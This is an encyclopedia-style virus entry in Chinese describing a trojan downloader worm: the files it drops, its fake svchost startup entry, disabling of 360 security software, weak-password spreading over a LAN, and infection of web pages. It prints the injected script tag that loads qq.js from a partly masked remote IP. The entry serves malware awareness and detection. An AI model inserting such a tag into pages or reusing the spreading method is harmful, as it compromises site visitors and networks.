反饋

感染蟲下載器45056

這是一個木馬病毒。該病毒運行後，會指定的網絡上下載病毒程序，並且會搜索局域網內機器，以弱口令進行嘗試性連接，一旦連接成功，則判斷該機器弱口令是否有足夠的權限，有則向該遠程機器發送惡意數據，然後利用windows漏洞來下載程序，予以執行。

感染蟲下載器45056基礎信息

Win32.Troj.Downloader.c.45056

感染蟲下載器45056病毒別名:

威脅級別:

★★☆☆☆病毒類型:

45056影響系統:

Win9x WinNT

1.病毒運行後，產生以下病毒文件

%WINDIR%\ SYSTEM32\tmipo.bat

%WINDIR%\ SYSTEM32\taimpo.txt

2.添加病毒啓動項

啓動項名:svchost 對應路徑:%Documents and Settings%\Administrator\桌面\ctfmon.exe

3.病毒會觸發taimpo.bat病毒文件,用來關閉"360安全衞士",使用户的安全性能降低.

4.病毒會檢測連接的遠程機器,當遠程機器的登錄木馬是弱口令時,則會對該機器進行攻擊,最後下載adi.vbs到用户機器上.

5.遍歷磁盤，查找*.htm、*.PHP、*.ASP等網頁文件，開始感染,插入一段JS代碼：

script language=javascript src=http://218.**.**.248/qq.js

詞條統計